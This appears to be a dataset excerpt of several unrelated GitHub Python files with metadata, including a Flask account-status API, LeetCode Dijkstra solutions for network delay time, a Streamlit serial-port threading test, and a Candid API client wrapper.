print(f'Maior número: {numero[-1]}')'''
|
andrematos90/Python
|
CursoEmVideo/Módulo 1/Desafio 033.py
|
Desafio 033.py
|
py
| 628 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
13301338601
|
from bson.objectid import ObjectId
from flask import Blueprint, jsonify
from assets.extensions import mongo
from assets.decors import errorhandler, tokenrequired
accounts = Blueprint("accounts", __name__, url_prefix="/accounts")
# STATUS
@accounts.route("/<account_id>/status", methods=["GET"])
@tokenrequired
@errorhandler
def get_status(current_user, account_id):
# query the user collection for account status
accounts = mongo.db.users.find_one({"_id": ObjectId(current_user["_id"]["$oid"])})[
"Accounts"]
if account_id in accounts:
status = accounts[account_id]["Active"]
return jsonify({"account_status": status, "account_id": account_id}), 200
return jsonify({"error": "invalid account id", "account_id": account_id}), 400
@accounts.route("/<account_id>/status", methods=["PUT"])
@tokenrequired
@errorhandler
def update_status(current_user, account_id):
resp = mongo.db.users.update_one({"_id": ObjectId(current_user["_id"]["$oid"])},
[{"$set": {f"Accounts.{account_id}.Active": {"$eq": [False, f"$Accounts.{account_id}.Active"]}}}])
# if update did not occur because no account id found
if resp.matched_count == 0 or resp.modified_count == 0:
return jsonify({"error": "failed to update status", "account_id": account_id}), 400
return jsonify({"success": "status updated", "account_id": account_id}), 201
|
TreyThomas93/tos-python-web-app-server
|
api/accounts/__init__.py
|
__init__.py
|
py
| 1,434 |
python
|
en
|
code
| 0 |
github-code
|
6
|
14471424043
|
'''
There are N network nodes, labelled 1 to N.
Given times, a list of travel times as directed edges times[i] = (u, v, w), where u is the source node, v is the target node, and w is the time it takes for a signal to travel from source to target.
Now, we send a signal from a certain node K. How long will it take for all nodes to receive the signal? If it is impossible, return -1.
Example 1:
Input: times = [[2,1,1],[2,3,1],[3,4,1]], N = 4, K = 2
Output: 2
Note:
N will be in the range [1, 100].
K will be in the range [1, N].
The length of times will be in the range [1, 6000].
All edges times[i] = (u, v, w) will have 1 <= u, v <= N and 0 <= w <= 100.
'''
# Dijkstra's heap O(E logE) time and O(N + E) space
from collections import defaultdict
from heapq import *
class Solution:
def networkDelayTime(self, times: List[List[int]], N: int, K: int) -> int:
graph = defaultdict(list)
for u, v, w in times:
graph[u].append((w,v))
pq = [(0, K)]
dist = {}
while pq:
d, node = heappop(pq)
if node in dist:
continue
dist[node] = d
for d2, nei in graph[node]:
if nei not in dist:
heappush(pq, (d+d2, nei))
return max(dist.values()) if len(dist) else -1
# Dijkstra's basic O(N**2 + E) and O(N + E) space
from collections import defaultdict
class Solution:
def networkDelayTime(self, times: List[List[int]], N: int, K: int) -> int:
graph = defaultdict(list)
for u, v, w in times:
graph[u].append((w,v))
dist = {node: float('inf') for node in range(1, N+1)}
seen = [False] * (N+1)
dist[K] = 0
while True:
cand_node = -1
cand_dist = float('inf')
for i in range(1, N+1):
if not seen[i] and dist[i] < cand_dist:
cand_dist = dist[i]
cand_node = i
if cand_node < 0:
break
seen[cand_node] = True
for d, nei in graph[cand_node]:
dist[nei] = min(dist[nei], dist[cand_node] + d)
ans = max(dist.values())
return ans if ans < float('inf') else -1
# dfs O(N**N + ElogE) time and O(N + E) space
from collections import defaultdict
class Solution:
def networkDelayTime(self, times: List[List[int]], N: int, K: int) -> int:
graph = defaultdict(list)
for u, v, w in times:
graph[u].append((w,v))
dist = {node: float('inf') for node in range(1, N+1)}
def dfs(node, elapsed):
if elapsed >= dist[node]:
return
dist[node] = elapsed
for time, nei in sorted(graph[node]):
dfs(nei, elapsed + time)
dfs(K, 0)
ans = max(dist.values())
return ans if ans < float('inf') else -1
|
loganyu/leetcode
|
problems/743_network_delay_time.py
|
743_network_delay_time.py
|
py
| 3,027 |
python
|
en
|
code
| 0 |
github-code
|
6
|
40017302365
|
# import streamlit as st
# import threading
import time
# # 定义共享变量
# is_running = True
# # 定义线程函数
# def thread_function():
# a = 0
# st.text(f'in to thread')
# global is_running
# while is_running:
# # 线程执行的逻辑
# a += 1
# st.text(a)
# time.sleep(1)
# st.text(f'out thread')
# def stop():
# # 当需要停止线程时
# global is_running
# if st.button('stop'):
# is_running = False
# if st.button('start'):
# is_running = True
# if __name__ == "__main__":
# # 创建线程并启动
# thread = threading.Thread(target=thread_function)
# thread.start()
# stop()
import threading
# 定义共享变量
is_running = threading.Event()
# 定义线程函数
def thread_function():
while not is_running.is_set():
# 线程执行的逻辑
print(1)
# 当需要停止线程时
def stop():
is_running.set()
if __name__ == "__main__":
# 创建线程并启动
thread = threading.Thread(target=thread_function)
thread.start()
time.sleep(1)
stop()
stop_flag = threading.Event()
def receive_data():
print(f'into receive data')
while not stop_flag.is_set():
ser = serial.Serial(port, baud_rate, timeout=1)
received_data = [] # List to store received data
start_time = time.time() # Start time of data fetching
inner_time = time.time()
while not stop_flag.is_set():
data = ser.readline().decode().strip() # Read a line of data and remove whitespace
elapsed_time = time.time() - start_time
if data:
print(data)
received_data.append(data)
inner_time = time.time()
if time.time() - inner_time > timeout_seconds:
print(f'Time out for: {elapsed_time}')
break
ser.close()
end_time = time.time() - start_time # duration of one cycle
# Save received data as a text file only if it has been fetched for more than 10 seconds
if end_time >= fetch_duration_threshold:
file_name = f"./temp/received_data.txt"
# Save received data to a new text file
with open(file_name, 'w') as file:
file.write('\n'.join(received_data))
print('Finish one record')
time.sleep(1) # Wait for 1 second before restarting the loop
print(f'end receive.')
def main():
model = get_model()
# your drinked
if st.checkbox("start receive"):
# 创建 Thread 实例
t1 = Thread(target=receive_data)
if st.button("start"):
print(f'st')
stop_flag.clear()
# 启动线程运行
t1.start()
# 等待所有线程执行完毕
if st.button("stop"):
stop_flag.set()
print(f'flag {stop_flag.is_set()}')
|
YuTheon/NUS_AIOT_web2
|
test.py
|
test.py
|
py
| 2,927 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22425229606
|
import typing
from pydantic import BaseModel, root_validator
from candid import CandidApiEnvironment
from candid.client import CandidApi, AsyncCandidApi
from candid.resources.auth.client import AuthClient, AsyncAuthClient
from candid.resources.auth.resources.v_2 import AuthGetTokenRequest
from candid.resources.billing_notes.client import BillingNotesClient, AsyncBillingNotesClient
from candid.resources.encounters.client import EncountersClient, AsyncEncountersClient
from candid.resources.expected_network_status.client import ExpectedNetworkStatusClient, \
AsyncExpectedNetworkStatusClient
from candid.resources.payers.client import PayersClient, AsyncPayersClient
class CandidApiClientOptions(BaseModel):
token: typing.Optional[str]
client_id: typing.Optional[str]
client_secret: typing.Optional[str]
@root_validator(pre=False)
def token_or_client_id_and_secret_present(cls, values):
if values.get("token") is not None:
return values
elif values.get("client_id") is not None and values.get("client_secret") is not None:
return values
raise ValueError("Either token or client_id and client_secret must be provided")
def get_token_for_options(options: CandidApiClientOptions, environment: CandidApiEnvironment) -> str:
if options.token is not None:
return options.token
else:
unauthed_client = CandidApi(environment=environment, token=None)
response = unauthed_client.auth.v_2.get_token(request=AuthGetTokenRequest(client_id=options.client_id, client_secret=options.client_secret))
return response.access_token
class CandidApiClient:
def __init__(
self, *, options: CandidApiClientOptions, environment: CandidApiEnvironment = CandidApiEnvironment.PRODUCTION
):
candid = CandidApi(token=get_token_for_options(options, environment), environment=environment)
self.auth = candid.auth
self.encounters = candid.encounters
self.billing_notes = candid.billing_notes
self.expected_network_status = candid.expected_network_status
self.payers = candid.payers
class AsyncCandidApiClient:
def __init__(
self, *, options: CandidApiClientOptions, environment: CandidApiEnvironment = CandidApiEnvironment.PRODUCTION
):
candid = AsyncCandidApi(token=get_token_for_options(options, environment), environment=environment)
self.auth = candid.auth
self.encounters = candid.encounters
self.billing_notes = candid.billing_notes
self.expected_network_status = candid.expected_network_status
self.payers = candid.payers
|
candidhealth/candid-python
|
src/candid/candid_api_client.py
|
candid_api_client.py
|
py
| 2,650 |
python
|
en
|
code
| 0 |
github-code
|
6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.